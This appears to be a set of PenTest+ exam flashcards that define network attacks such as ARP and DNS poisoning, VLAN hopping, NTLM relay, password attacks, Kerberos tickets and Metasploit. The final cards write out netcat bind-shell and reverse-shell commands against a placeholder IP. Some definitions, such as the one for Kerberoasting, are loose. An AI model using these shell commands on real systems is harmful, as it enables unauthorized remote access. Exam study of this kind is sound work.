Pentest + - Network Attacks

Stress Testing

A software testing method that evaluates how software performs under extreme load

Packet Storm/Network Storm

Any large increase in network traffic directed at a target. This typically involves random characters or data flooding the target.

Character Generator Protocol

A protocol used in testing, debugging, and measuring of the network and operates over tcp or UDP on port 19. Can be used to perform packet/network storm.

Exploit Database (DB)

A complete collection of public exploits, vulnerable software, Shellcode, and Security Papers. Kept in a fully searchable database.

• expoit-db.com

Packet Storm (Exploit Resource Wbesite)

A web resource that contains news articles, advisories, whitepapers, tools, and exploits that can be reviewed and used in pen tests

Exploit Chaining

The act of using multiple exploits to form a larger attack (sequentially or in parallel)

Address Resolution Protocol (ARP)

A TCP/IP protocol used automatically on a LAN to determine the MAC address that corresponds to a particular IP address.

ARP Cache

A table containing local MAC addresses and their corresponding IP addresses.

ARP Spoofing

Sending falsified ARP packets over a LAN to link an attacker's MAC address with an IP of a legitimate computer already on the LAN.

ARP Poisoning

After a successful ARP spoofing, a hacker changes the company's ARP table, so it contains falsified MAC maps

Arpspoof

A tool that can be used to conduct arp spoofing on a target machine's IP

DNS Poisoning

An attack that substitutes DNS addresses in the DNS cache on DNS servers, routers, etc. so that the computer is automatically redirected to an attacker's device.

DNS Security Extensions (DNSSEC)

Uses digital signatures based on public key cryptography to ensure dns data is digitally signed by the owner. Helps to protect against dns spoofing/poisoning

DNS Zone Transfer

A method of replicating DNS database entries across a set of DNS servers

DNS Harvesting

A form of OSINT used to gather information about a domain name and its associated resources

Link-Local Multicast Name Resolution (LLMNR)

A protocol based on the formatting of DNS packets that serves the same function as a DNS server when a DNS server cannot be reached. It resolves names of devices connected collectively on a local network and only works when the devices are on the same LAN. Only works for windows systems.

NetBIOS Name Service (NBNS or NBT-NS)

A service that is part of the NetBIOS over TCP protocol suite that is used as a type of name resolution inside the local network to translate internal hostnames to IP addresses

___ example: //FileServer or //ShareDrive

Responder Tool

A command line tool in Kali Linux that is used to poison NetBIOS, LLMNR, and mDNS name resolution protocol requests

MAC Spoofing

a technique for changing a factory-assigned MAC address of a network interface on a networked device

macchanger

a kali command line tool for spoofing your mac address

Virtual Local Area Network (VLAN)

a virtualized connection that connects multiple devices and network nodes that share a physical LAN, isolating the traffic for each group

VLAN Hopping

An attack technique that exploits a misconfiguration to gain access to traffic on other VLANs without the proper authorization

Double Tagging

A VLAN hopping attack method where an attacker tried to reach another VLAN using the vulnerabilities in the trunk port configuration

Switch spoofing

A VLAN hopping attack method where an attacker attempts to conduct dynamic trunking protocol (DTP) negotiation

MAC address flooding attack (CAM table flooding attack)

A VLAN hopping attacker where you overload the network switch's mac table and put the switch into fail-open mode and make it start behaving like a network Hub (broadcast your requests to all vlans)

Network Access Control (NAC)

Security technology in which devices are scanned to determine its current state prior to being allowed access onto a private network (keep unauthorized users or devices from accessing). Might check mac addresses, AV status, os version, etc.

Persistent Agent (NAC software)

A piece of network access control software installed on a device requesting access to the network. (no access without agent)

Non-Persistent Agent (NAC software)

A network access control solution that requires users to connect to/log into a captive portal (web page) and download a ____ NAC agent that scans their device for compliance. The software then removes itself after the scan.

Agentless NAC/Volatile Agent

Installs the NAC scanning engine on the domain controller instead of the endpoint device.

On-Path Attack (formerly Man-in-the-middle)

An attack where the attacker puts themselves between the victim and the intended destination

Replay Attack

A replay attack occurs when a cybercriminal eavesdrops on a secure network communication (e.g. an authentication message), intercepts it, and then fraudulently delays or 'replays' it to misdirect the receiver into doing what the hacker wants.

Relay attack

in a ____ attack, an attacker intercepts communication between two parties and then, without viewing or manipulating it, relays it to another device. For example, a thief could capture the radio signal from your vehicle's key fob and relay it to an accomplice who could use it to open your car door.

NTLM relay attacks

____ relay attacks allow attackers to sit between clients and servers and relay validated authentication requests in order to access network services.

In a ____ relay attack, an attacker establishes a position between the client and server on the network and intercepts authentication traffic. Client authentication requests are forwarded to the server by the attacker, similarly challenges are relayed to the client and valid authentication responses to the challenge from the client are sent back to the server, allowing the attacker—rather than the client—to authenticate using the client's credentials.

SSL Stripping

An attack that focuses on stripping the security from HTTPS-enabled websites (present user with HTTP connection)

Password Crackers

software that can guess/break a user's password by using Dictionary or brute force techniques. Tools include John the Ripper and Cain and Abel

Dictionary Password Attack

A password attack that uses a list of common passwords, words, phrases, etc. to guess the password.

brute force password attack

an attempt to guess a password by attempting every possible combination of characters and numbers in it

Rainbow Table

Table of precomputed hash values that contain known passwords used for offline password cracking

Password Spraying

A password attack/brute force method in which multiple user accounts are tested with a dictionary of common passwords (checking multiple accounts hoping someone might have lax security)

Credential Stuffing

Testing stolen user account names and passwords against multiple websites (user's use same password on multiple sites)

Pass the Hash Attacks

A network based attack where the attacker steals hashed user credentials and used them as is to try to authenticate to the same network the hash credentials originate from. NTLM relay attacks are an example of this type of attack.

Mimikatz

Is an open-source application that allows users to view and save authentication credentials such as Kerberos tickets by scanning lsass. Attacker can then perform pass the hash attacks.

Kerberoasting

Technique that allows any domain user account with a service principal name to set a service granting ticket in the ticket granting service

Golden Ticket

A master ticket that comes from the Kerberos ticket-granting-ticket, which can be used for any Kerberos service. Very desirable for attackers.

Silver Ticket

A ticket granting service ticket that is only good for certain Kerberos-specific services

Metasploit

____ is an open-source pen testing framework that is a tool for developing and executing exploit code against a remote target machine and aids in penetration testing and IDS signature development. Developed by Rapid7. Launched by the msfconsole command. Exploit and payload library for launching attacks.

Netcat (nc)

Command Line Utility for reading from and writing raw data to network connections (establishing shells)

Bind shell

a type of shell connection where the attacker installs a listening port onto the victim's machine that the attacker can connect to. Less effective today due to increased security from firewalls.

Reverse Shell

a type of shell connection where attacker installs a listener on their own workstation and configures a listening port that they manipulate the target machine to communicate with (no abnormal open ports on the target machine)

nc -l -p 443 -e cmd.exe

this is the netcat command to listen on port 443 and execute the windows cmd terminal (cmd.exe). This would be an example of a bind shell since port 443 is being opened on the target machine.

nc -l -p 443

tell netcat to listen on port 443 on your attacking machine (the first half of establishing a reverse shell)

nc [ip address] 443 -e cmd.exe

the netcat command to tell a remote system to execute cmd.exe on port 443. This is the second half of establishing a reverse shell as you would need to be listening on port 443 already on your attacking machine.